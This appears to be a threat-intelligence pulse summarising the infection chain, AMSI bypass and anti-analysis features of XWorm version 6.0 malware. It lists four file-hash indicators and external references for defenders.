XWorm V6: Advanced Evasion and AMSI Bypass Capabilities Revealed

July 30, 2025, 7:20 p.m.

Description

A new version of XWorm malware (version 6.0) has been discovered, showcasing advanced features for persistence and evasion. The infection chain begins with a VBScript that downloads and executes a PowerShell script. This script implements an AMSI bypass by modifying CLR.DLL in memory, then downloads and loads the XWorm binary. The latest version includes the ability to run as a critical process, preventing termination without admin privileges. It also introduces new anti-analysis techniques, such as terminating on Windows XP and detecting execution in data centers or hosting providers. The malware maintains its in-memory execution and continues to employ various evasion techniques.

External References

https://www.netskope.com/blog/xworm-v6-0-enhanced-malware-protection-and-stealthy-delivery
https://otx.alienvault.com/pulse/688a6c15c21f7753aad69da1
Tags
malware
xworm
evasion
persistence
anti-analysis
in-memory execution
2025-07-30
amsi bypass

Date

  • Created: July 30, 2025, 7:01 p.m.
  • Published: July 30, 2025, 7:01 p.m.
  • Modified: July 30, 2025, 7:20 p.m.

Indicators

  • e73f48fe634a0c767bd596bbd068a13be7465993633fd61ccda717a474ee2db2
  • 9dd4902099e23c380596e7061482560866e103d2a899b84e0b6ff98c44c494e4
  • 4648ce5e4ce4b7562a7828eb81f830d33ab0484392306bc9d3559a42439c8558
  • c4c533ddfcb014419cbd6293b94038eb5de1854034b6b9c1a1345c4d97cdfabf
Download all indicators here!

Attack Patterns

  • XWorm